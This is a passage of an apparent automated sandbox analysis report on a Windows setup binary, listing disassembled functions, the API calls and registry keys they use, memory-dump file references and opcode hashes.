                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\WPA\ApplianceServer,00000000,00000001,?), ref: 6C5EA972
                                                                                              • RegQueryValueExA.ADVAPI32(?,Installed,00000000,?,?,?), ref: 6C5EA999
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA9BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Installed$System\WPA\ApplianceServer
                                                                                              • API String ID: 3677997916-2615809295
                                                                                              • Opcode ID: 65626f948dc9439adec9f078b6b1f8f19b65aac934e0e06bfc484696e86f0704
                                                                                              • Instruction ID: 0b2016b180a3bccaf13faa2fff0c664ec5b3fb6eb54111532fd6e2ddc245d535
                                                                                              • Opcode Fuzzy Hash: 65626f948dc9439adec9f078b6b1f8f19b65aac934e0e06bfc484696e86f0704
                                                                                              • Instruction Fuzzy Hash: DC018471A00244EBDF01DBB5CC45BAE7BB9BB09328F160316F121E1581E770A644DB49
                                                                                              Function 63967E95 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryfileloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,63967F46,00002100,00000002,00000000,63967BC3,C0000000,?,?,?,63967BC3,?,C0000000,00000000), ref: 63967EA6
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 63967EB6
                                                                                              • CreateFileW.KERNEL32(00002100,00000002,00000000,C0000000,?,63967BC3,00000000,?,?,63967F46,00002100,00000002,00000000,63967BC3,C0000000,?), ref: 63967EF3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCreateFileHandleModuleProc
                                                                                              • String ID: CreateFileTransactedW$kernel32.dll
                                                                                              • API String ID: 2580138172-2053874626
                                                                                              • Opcode ID: c9785bb500b279267fbf1c7530936dec69c9438b0f6c60946c107b9e35401e8e
                                                                                              • Instruction ID: 8f85009f0eec2f6218bd3557907ded8f3cc29039593de93ed5321976956f231f
                                                                                              • Opcode Fuzzy Hash: c9785bb500b279267fbf1c7530936dec69c9438b0f6c60946c107b9e35401e8e
                                                                                              • Instruction Fuzzy Hash: 6701D23200554AFF8F226E95CC08C9F3F2AEB8AB90B144914FA6485821C736C975EF60
                                                                                              Function 6C5EA7C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtQueryInformationProcess), ref: 6C5EA7DB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C5EA7E2
                                                                                              • GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 6C5EA7F8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCurrentHandleModuleProcProcess
                                                                                              • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                              • API String ID: 4190356694-2906145389
                                                                                              • Opcode ID: 46af6b7b7939a9654b221feb5901f7463ea712830a085171eb2e999e9ab7b417
                                                                                              • Instruction ID: 05719aea5d96d131ce47e03ace9dc01913f8702ee952aa75e9ab669a472a6423
                                                                                              • Opcode Fuzzy Hash: 46af6b7b7939a9654b221feb5901f7463ea712830a085171eb2e999e9ab7b417
                                                                                              • Instruction Fuzzy Hash: 12F0E271A09310ABDB0096B58C08F873FB8DB5A764F124921F520D2580D370D8038BA8
                                                                                              Function 63959AD4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • IDS_FILE_VERIFICATION_PROGRESS_STATUS, xrefs: 63959AF7
                                                                                              • IDS_DOWNLOAD_SUCCESS, xrefs: 63959B02
                                                                                              • IDS_FILE_VERIFICATION_SUCCESS, xrefs: 63959AF0
                                                                                              • IDS_DOWNLOAD_PROGRESS_STATUS, xrefs: 63959B09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: IDS_DOWNLOAD_PROGRESS_STATUS$IDS_DOWNLOAD_SUCCESS$IDS_FILE_VERIFICATION_PROGRESS_STATUS$IDS_FILE_VERIFICATION_SUCCESS
                                                                                              • API String ID: 431132790-1342741052
                                                                                              • Opcode ID: 1f7687705116cbc358faad25db982f0f5bd17bdb3f308f2dc57dff6ac7d10d04
                                                                                              • Instruction ID: c6f4fc87c1267d00e05ddbf2c28e8348af9dfec7b5e12054d7884892d66d9773
                                                                                              • Opcode Fuzzy Hash: 1f7687705116cbc358faad25db982f0f5bd17bdb3f308f2dc57dff6ac7d10d04
                                                                                              • Instruction Fuzzy Hash: F90181F28083458BFB20CBB8C844BAA77B0EF56F28F198959E1518B395C775D998CF41
                                                                                              Function 6C5EA847 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000001,?), ref: 6C5EA865
                                                                                              • RegQueryValueExA.ADVAPI32(?,ServerAdminUI,00000000,00000000,00000000,?), ref: 6C5EA88A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA893
                                                                                              Strings
                                                                                              • ServerAdminUI, xrefs: 6C5EA87B
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 6C5EA85B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: ServerAdminUI$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                              • API String ID: 3677997916-377279143
                                                                                              • Opcode ID: e5f818ad8478762e7bcb6f42d7b17d3b52ed0d7c123e5c49c204d912b63b191d
                                                                                              • Instruction ID: 23a018aa3e20a1a92fa7fdd12d5c796b13494a74ba1175782c2e7e84447a0c23
                                                                                              • Opcode Fuzzy Hash: e5f818ad8478762e7bcb6f42d7b17d3b52ed0d7c123e5c49c204d912b63b191d
                                                                                              • Instruction Fuzzy Hash: 2FF01C75A00208FFEB10DBA0CD49FCE7BB9AB08715F110051B604F1090D7B0AA4ADB59
                                                                                              Function 6C5DE0FF Relevance: 7.6, APIs: 5, Instructions: 150timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C5DC33D: GetLastError.KERNEL32(6C5F0088,?,6C5DC203,?,?,?,00000000), ref: 6C5DC343
                                                                                                • Part of subcall function 6C5DC33D: SetLastError.KERNEL32(00000000,?,6C5DC203,?,?,?,00000000), ref: 6C5DC354
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6C5DC008,00000000,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5E378C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6C5DC008,00000000), ref: 6C5E3824
                                                                                              • SystemTimeToFileTime.KERNEL32(?,6C5DC008,?,?,?,?,6C5DC008,00000000), ref: 6C5E3852
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6C5DC008,00000000), ref: 6C5E386E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Time$FileSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3446928799-0
                                                                                              • Opcode ID: cc57c9bd6b3f410b2f32b7cbb2fda93d4f2fb3b6c05aa60cecb35e210d767f1f
                                                                                              • Instruction ID: 904d615bff2fe260c96351f2c2826b0744918644a69f5029b88c5192322c19df
                                                                                              • Opcode Fuzzy Hash: cc57c9bd6b3f410b2f32b7cbb2fda93d4f2fb3b6c05aa60cecb35e210d767f1f
                                                                                              • Instruction Fuzzy Hash: B851CF71601344AFDB05DFA9CC80FAA7BF9FB89388F16045AE125D7A60D770E944CB68
                                                                                              Function 6394D086 Relevance: 7.6, APIs: 5, Instructions: 88memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: StringVariant$AllocClearFreeH_prolog3Init
                                                                                              • String ID:
                                                                                              • API String ID: 1692324188-0
                                                                                              • Opcode ID: 1ae77846e8f2e97f09100df955e8716baee7a3b2fe5a076f67e4a31d55e49f36
                                                                                              • Instruction ID: b05ccbfed3a00881285aacaa2db5c459a93b860ed05e66a10e8a5723131bbd15
                                                                                              • Opcode Fuzzy Hash: 1ae77846e8f2e97f09100df955e8716baee7a3b2fe5a076f67e4a31d55e49f36
                                                                                              • Instruction Fuzzy Hash: 68318D75900208EFDF14EFA4C848A9E7BB8EF89754F188599F865EB242D735DA40CF60
                                                                                              Function 6C5E6513 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E6538
                                                                                              • GetLastError.KERNEL32 ref: 6C5E659B
                                                                                              • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,00000000,UserId,?), ref: 6C5E65FA
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$MessageTracememset
                                                                                              • String ID: Software\Microsoft\SQMClient$UserId
                                                                                              • API String ID: 1733364027-3032788761
                                                                                              • Opcode ID: 0dac37c1b34d8476a7df75d268a441ddd2324cb8e665dc63d4c0919454881ac6
                                                                                              • Instruction ID: eaaa5ffbc04ecea3eb74decb646567b4bb8b8f46e66579e56a7d26df0e67f1f2
                                                                                              • Opcode Fuzzy Hash: 0dac37c1b34d8476a7df75d268a441ddd2324cb8e665dc63d4c0919454881ac6
                                                                                              • Instruction Fuzzy Hash: A3213571304398EBC700DB958C84F9B37B9AB89398F95002AF725DB952CB70DD88CB14
                                                                                              Function 6396269C Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyPropertySheetPage.COMCTL32(?,00000000), ref: 639626C1
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000000), ref: 639626FE
                                                                                              • CreatePropertySheetPageW.COMCTL32(?,00000000,00000000), ref: 63962716
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 63962735
                                                                                              • DestroyPropertySheetPage.COMCTL32(00000000), ref: 63962751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: PagePropertySheet$Destroy$CreateExceptionMessageRaiseSend
                                                                                              • String ID:
                                                                                              • API String ID: 1284076499-0
                                                                                              • Opcode ID: 1646253b2fee7db8aae6c3666431e60901ad903100773dd33c8c76b55201ef61
                                                                                              • Instruction ID: 217dfe178c4feed40bf3d613504d7f07101ef6be348a6acfcbd942e6a8bce7eb
                                                                                              • Opcode Fuzzy Hash: 1646253b2fee7db8aae6c3666431e60901ad903100773dd33c8c76b55201ef61
                                                                                              • Instruction Fuzzy Hash: 8E219F72601754AFEB20AF5ED8C4D4BB7F9AB87BA4715442AF985E7600CB70EC418F60
                                                                                              Function 6C5D2671 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C5F0168,00000FA0,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D268E
                                                                                              • GetLastError.KERNEL32(?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5DF520
                                                                                                • Part of subcall function 6C5D17EB: malloc.MSVCRT ref: 6C5D17F6
                                                                                              • SetLastError.KERNEL32(00000000,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D26D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CountCriticalInitializeSectionSpinmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2914686227-0
                                                                                              • Opcode ID: 4e951c6a618e28dfb9bfb00a30179014ffded6db3c599ced6de1d267099213f3
                                                                                              • Instruction ID: 2284cdf09284f43cbb1f148681aed718d391c1d7e5e30a5a67f106a50f6eea08
                                                                                              • Opcode Fuzzy Hash: 4e951c6a618e28dfb9bfb00a30179014ffded6db3c599ced6de1d267099213f3
                                                                                              • Instruction Fuzzy Hash: 8B219330351340AFEB49DF29EC44F563AF8AB86359F970555F125CAAA2C770D885CF18
                                                                                              Function 6C5DBCC7 Relevance: 7.6, APIs: 5, Instructions: 70libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5DBCF7
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,6C5D0000), ref: 6C5DBD0C
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,6C5D0000), ref: 6C5DBD21
                                                                                              • GetLastError.KERNEL32(?,?,6C5D0000), ref: 6C5DF94F
                                                                                              • GetLastError.KERNEL32(?,?,6C5D0000), ref: 6C5DF98C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileLibraryLoadModuleNamememset
                                                                                              • String ID:
                                                                                              • API String ID: 2354241510-0
                                                                                              • Opcode ID: c7443d200021e62d9d58b04d102807852df7ab421cafa1b21b06c76d0c2fcd4a
                                                                                              • Instruction ID: 17c2839d3b17c81c1096dc040563ddd23ace5fda8d339364fc483d3402f84663
                                                                                              • Opcode Fuzzy Hash: c7443d200021e62d9d58b04d102807852df7ab421cafa1b21b06c76d0c2fcd4a
                                                                                              • Instruction Fuzzy Hash: 7221DE71A41344ABCB00EF99CC48F9B3BFEAB89314F520195E525C7652C730E988CF68
                                                                                              Function 6395C1B2 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowTextW.USER32(?,?), ref: 6395C1C2
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 6395C1CD
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 6395C1F7
                                                                                              • GetParent.USER32(?), ref: 6395C206
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,6395C10E,00000110), ref: 6395C22D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionItemMessageParentRaiseSendTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3396959766-0
                                                                                              • Opcode ID: 82625cb1ba374030e7598c42025de069df9d76abeedf4538fcf63cc5591278ad
                                                                                              • Instruction ID: c94213a8ef8fef3a267f386683c9914411382fec196ef0c7fe5649804c546681
                                                                                              • Opcode Fuzzy Hash: 82625cb1ba374030e7598c42025de069df9d76abeedf4538fcf63cc5591278ad
                                                                                              • Instruction Fuzzy Hash: 9211E331904304BFD721EFA5DC84D5BBBE9EF4ABA8B104429F546C6520DB71E861CF60
                                                                                              Function 6395CB21 Relevance: 7.6, APIs: 5, Instructions: 56windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395CB28
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB50
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB5D
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB6A
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyIcon$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 1886938828-0
                                                                                              • Opcode ID: 750ca209e26651086657919455be3f9a6c2fda48d1b171175055ec1d4aa040c2
                                                                                              • Instruction ID: 8e462afd6e0a52b0b423bc32b2a4f3a6ae711582cf57da6a3505ca24d14a264e
                                                                                              • Opcode Fuzzy Hash: 750ca209e26651086657919455be3f9a6c2fda48d1b171175055ec1d4aa040c2
                                                                                              • Instruction Fuzzy Hash: 0F115B70B00706ABEB14DF74C944B9AB7BCBF11B68F040619B528D7281CB74E960CFA1
                                                                                              Function 639603F5 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 63960415
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6396042B
                                                                                              • TranslateMessage.USER32(?), ref: 63960435
                                                                                              • DispatchMessageW.USER32(?), ref: 6396043F
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6396044E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                              • String ID:
                                                                                              • API String ID: 2015114452-0
                                                                                              • Opcode ID: d82c0db18feb3e347e39beb79bca041cd785a076aa64f2e81fa06f584a186b15
                                                                                              • Instruction ID: 9404b134be5dca0310dcd51cf40793baa22303602b895408f124e36f2ecf7be3
                                                                                              • Opcode Fuzzy Hash: d82c0db18feb3e347e39beb79bca041cd785a076aa64f2e81fa06f584a186b15
                                                                                              • Instruction Fuzzy Hash: FF017572806229BBDF20A6E18C48DDF7A7CEF477A4F040115F611E6180E674D115CAB0
                                                                                              Function 6C5D256E Relevance: 7.5, APIs: 5, Instructions: 44timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6C5E4788
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6C5E4794
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6C5E479C
                                                                                              • GetTickCount.KERNEL32 ref: 6C5E47A4
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C5E47B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: d2ce4d1d4aafe385bb4d7c934168c0b9dfb31bc228f5e316c95f4b74cad54e6b
                                                                                              • Instruction ID: 79b44dff11d330707cabf245e9621970115b845926f33cff5c940e0f83e3d5b0
                                                                                              • Opcode Fuzzy Hash: d2ce4d1d4aafe385bb4d7c934168c0b9dfb31bc228f5e316c95f4b74cad54e6b
                                                                                              • Instruction Fuzzy Hash: 3701ED76E002249BCF119BF9DC48A9AB7F8FB4E255F974955D811E7104D730A9408F88
